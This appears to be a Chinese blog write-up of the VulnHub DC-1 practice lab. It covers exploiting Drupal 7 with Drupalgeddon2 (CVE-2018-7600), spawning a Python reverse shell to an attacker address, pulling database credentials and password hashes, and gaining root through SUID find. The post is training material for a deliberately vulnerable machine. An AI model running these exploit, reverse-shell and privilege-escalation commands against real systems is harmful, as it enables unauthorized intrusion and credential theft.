DC: 1

于 2022-06-13 22:36:32 发布
阅读量511 收藏
点赞数
分类专栏: vulnhub 文章标签: Drupal mysql find RCE python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125268956
版权

渗透思路:

nmap扫描----利用Drupal 7的RCE(CVE-2018-7600)getshell----python反弹shell----非渗透路径:Drupal配置文件中找到数据库用户名密码----非渗透路径:数据库中找到flag3、/home/flag4下发现flag4----suid权限的find命令提权

环境信息:

靶机:192.168.101.74

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.74

2、利用Drupal 7的RCE(CVE-2018-7600)getshell

从nmap对80端口的扫描结果中可以看出,网站是基于Drupal 7的。

https://www.exploit-db.com上搜索Drupal 7发现一堆漏洞。由于网站需要登录,但目前又不知道用户名密码,所以排除掉一大批需要身份认证的exp。对最后剩下的几个RCE的exp进行进一步研究,主要是看涉及的url是否可访问,最终锁定Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution - PHP webapps Exploit,也就是下图中高亮的这个。

或者也可以在kali上用searchsploit命令搜索,这里仅给出命令,就不详细说了

searchsploit drupal 7
searchsploit -p php/webapps/44449.rb    #查找exp在系统上的绝对路径
cp /usr/share/exploitdb/exploits/php/webapps/44449.rb 44449.rb  #拷贝exp到当前目录

exp的名字叫44449.rb,在攻击机上执行

ruby 44449.rb

发现无法执行,且报错信息看上去像是无法载入文件highline/import

在exp中全局搜索,似乎没有地方需要用到import,所以索性把这行删掉(下图中16行)

然后再执行,发现需要以网站url作为参数

根据用法提示执行

​ruby 44449.rb http://192.168.101.74/

很快就得到了靶机shell,并且还发现了第一个flag:/var/www/flag1.txt

flag1.txt中提示每个好的CMS都有config文件,这个也有

3、得到python反弹shell

上一步中得到的靶机shell不能切换目录,所以还需要获取反弹shell。

由于上一步中得到的shell中不能重定向(>),所以用不包含重定向符号的python语句获取反弹shell

首先攻击机上nc监听8888端口

nc -nlvp 8888

然后在上一步得到的shell中执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.34",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

攻击机上获得靶机的反弹shell

4、Drupal配置文件中找到数据库用户名密码

根据flag1.txt中的提示,先找到Drupal的配置文件settings.php

find ./ -name settings.php

发现其相对路径为./sites/default/settings.php

查看这个配置文件,发现flag2,暗示权限不需要通过暴力破解获取,下面紧跟着就是数据库配置信息,很难不让人觉得flag3在数据库中。

'database' => 'drupaldb',

'username' => 'dbuser',

'password' => 'R0ck3t',

靶机shell中执行

ss -antp

发现靶机上起着mysql(3306端口)

使用/var/www/sites/default/settings.php中发现的mysql用户名(dbuser )和密码(R0ck3t)进行连接

mysql -u dbuser -p

连接成功

依次输入

mysql> use drupaldb;
mysql> show tables;
mysql> select * from users;

发现两个用户:admin和Fred,以及他们密码的散列

尝试解密密码散列并没有解出来

5、数据库中找到flag3

继续在数据库中找flag3,从网上的资料来看,网站内容是和节点node相关的,查看node相关的表中是否有flag3

mysql> select * from node;

虽然找到了flag3,但是仅仅是页面标题是flag3,其内容仍然不知道

在网上没找到网页内容在哪个数据表里,搜了几个看起来像的表之后发现好多表都是空的。

突然灵机一动,先把所有非空的表找出来

mysql> SELECT TABLE_NAME,TABLE_ROWS FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'drupaldb' AND table_rows > 0;

由于node表中数据行数为2,所以先在TABLE_ROWS为2的表中找,我运气好,一次就找到了

mysql> select * from field_data_body;

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

6、/home/flag4下发现flag4.txt

根据flag3中的提示想到了/etc/passwd文件

cat /etc/passwd

在该文件中发现了名为flag4的用户

尝试进入/home/flag4,发现该目录下有flag4.txt

7、find suid提权

从flag3的提示中还想到可能应该用find命令找有suid权限的命令

find / -user root -perm /4000 2>/dev/null

查找find | GTFOBins,发现find有suid权限时可以提权

find . -exec /bin/bash -p \; -quit

进入/root目录,发现thefinalflag.txt

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3.100个渗透测试实战#3(Lampiao)
qwsn
03-23 2276
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息;(网卡名:eht0;IP:192.168.97.129) 2.查看靶机页面; 3.探测特定网络内的,主机存活状态(netdiscover、arp-scan、nmap) 4.分析所得: (二)信息收集——端口(服务)扫描 1.扫描端口,以及端口对应的服务信息,以及靶机的操...
Drupal 远程代码执行漏洞复现(CVE-2018-7602)
Tauil的博客
08-08 884
使用parse_str,并存入options,还需要通过其他步骤来触发漏洞。的输入来处理请(GET,POST,COOKIE,REQUEST)中数据。建立vulhub/drupal/CVE-2018-7602/环境。访问http://靶机IP/shell.php即可看到新建的网页。使用以下poc.py,与官网不同的是强制定义命令为。对CVE-2018-7600漏洞的补丁通过过滤带有。会导致输入错误等等原因,所以进行了一点修改。中的URL进行URL编码,当对URL中的。形式的请求,发起请求需要对。...
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4406
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
[Drupal]CVE-2018-7600 BUUCTF
krysyal的博客
03-29 4558
[Drupal]CVE-2018-7600 BUUCTF 前期准备 进入之后环境安装 语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步 利用 直接使用网上公开的exp https://github.com/a2u/CVE-2018-7600 将exp里的命令换成env即可 反弹会话 可参考我上一篇文章,ssl反弹shell ...
CVE-2018-7600 Drupal 远程代码执行漏洞分析复现
yzl_007的博客
08-09 781
CVE-2018-7600 Drupal 远程代码执行漏洞分析复现 漏洞描述 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 使用vulhub镜像环境docker-compose up -d 成
DC-1靶场(CVE-2018-7600)
lionwerson的博客
10-14 1785
1.下载DC-1靶场: DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。 3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。 是一个Drupal CMS。 4.先挂扫描器走一波。 发现存在CVE-2018-7600Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。 poc如下: 漏洞存在,验证 poc: #!/usr/b..
Drupal Drupalgeddon 2远程执行代码漏洞RCECVE-2018-7600)漏洞复现
ADummy的博客
02-23 864
Drupal Drupalgeddon 2远程执行代码漏洞(CVE-2018-7600) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显—>getshell 0x01漏洞介绍 ​ 7.58之前的Drupal,8.3.9之前的8.x,8.4.6之前的8.4.x和8.5.1之前的8.5.x允许远程攻击者执行任意代码,因为该问题会影响具有默认或通用模块配置的多个子系统,包括表单API。。 影响版本 Drupal < 7.58 Drupal < 8.3
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal
_Co1a
05-09 843
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
搭建一个Drupal Core RCECVE-2019–6340 )漏洞的蜜罐
systemino的博客
06-15 613
不久前,我开始了一个管理真实网络蜜罐的项目。最初我建立它是为了管理一些WordPress蜜罐,但在Drupalgeddon2出来后,使我不得不重新构建该项目。这意味着我需要相当长的一段时间才能最终发布它。现在,我终于能够分享我的努力成果了:https://gitlab.com/SecurityBender/webhoneypot-framework。 Webhoneypot框架是使用Python...
dc:直流电
03-07
直流电直流电
Adobe Acrobat DC:未找到IMSLib
06-14
打开Adobe Acrobat DC时提示:未找到IMSLib。Acrobat服务将无法正常工作。 解压之后,复制文件到路径: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\P7 如果没有相关文件夹,可以先手动创建P7文件夹后...
matlab+人口增长代码-ACDC:大气团簇动力学代码
05-27
该存储库包含作为ACDC核心的聚类方程生成器(acdc_YYYY_MM_DD.pl),以及易于进行标准仿真的现成模板(ACDC_Matlab_standard和ACDC_Fortran_standard)。 有关所有可用功能的详细信息,可以在技术手册中找到,而快速...
dcDC资料注释,主要是SQL
02-11
DC SQL 追踪“数据查询愿望清单” asana板的查询不要签入查询结果或报告结果。 不要检查连接详细信息。
CVE-2018-7600Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2721
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal 的代码和文档,可以知道,对于
Drupal CVE-2018-7600 漏洞利用和攻击
weixin_34199405的博客
04-26 3922
背景介绍 2018年3月28日,Drupal Security Team官方发布了一个重要的安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站,该漏洞就是:CVE-2018-7600。 此消息一出,蠢蠢欲动的黑客们立马如天降尚方宝剑,都在暗处磨刀霍...
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1239
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
CVE-2018-7600 Drupal核心远程代码执行漏洞分析
weixin_34246551的博客
12-27 329
0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。...
[Vulfocus解题系列] 所复现漏洞总结
热门推荐
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。 已复现的Vulfocus靶场漏洞 Struts2-052远程代码执行(CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
func (c *cAsset) GetComponentList(r *ghttp.Request) {var req *v1.GetComponentListReq if err := r.Parse(&req); err != nil {r.Response.WriteJson(g.Map{"code": 1,"msg": err.Error(),})} filtering := &creativecomponent.GetFiltering{ComponentID: req.ComponentId,ComponentName: req.ComponentName, ComponentTypes: []enum.ComponentType{},Status: []enum.ComponentStatus{},} getRequest := &creativecomponent.GetRequest{AdvertiserID: req.AdvertiserId,Page: req.Page,PageSize: req.PageSize,Filtering: filtering,} res, err := service.Asset().Get(getRequest) if err != nil {r.Response.WriteJson(g.Map{"code": 2,"msg": err.Error(),})} r.Response.WriteJson(res)} 这段代码中GetComponentListReq的过滤条件为type GetComponentListReq struct {g.Meta path:"/get_component_list" tags:"查询组件列表" method:"post" sm:"组件列表"AdvertiserId uint64 json:"advertiser_id" v:"required" dc:"广告主id" Page int json:"page" dc:"页码" PageSize int json:"page_size" dc:"每页数量。默认值20,最新值10,最大值40" ComponentId uint64 json:"component_id" dc:"组件id" ComponentName string json:"component_name" dc:"组件名称" ComponentTypes string json:"component_types" dc:"组件类型" Status string json:"status" dc:"组件审核状态" } creativecomponent.GetRequest的过滤条件为type GetRequest struct { AdvertiserID uint64 json:"advertiser_id,omitempty" Page int json:"page,omitempty" PageSize int json:"page_size,omitempty" Filtering *GetFiltering json:"filtering,omitempty" },GetFiltering的过滤条件为type GetFiltering struct { // ComponentID 组件ID ComponentID uint64 json:"component_id,omitempty" // ComponentName 组件名称。支持模糊查询 ComponentName string json:"component_name,omitempty" // ComponentTypes 组件类型,不传查全部。 ComponentTypes []enum.ComponentType json:"component_types,omitempty" // Status 组件审核状态,不传查全部。 Status []enum.ComponentStatus json:"status,omitempty" }。现在想要把ComponentTypes参数放到[]enum.ComponentType{}中,Status参数放到[]enum.ComponentStatus{}中,使代码能够运行,该怎么做?请详细一点
最新发布
07-20
AdvertiserId uint64 `json:"advertiser_id" v:"required" dc:"广告主id"` Page int `json:"page" dc:"页码"` PageSize int `json:"page_size" dc:"每页数量。默认值20,最新值10,最大值40"` ComponentId uint...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值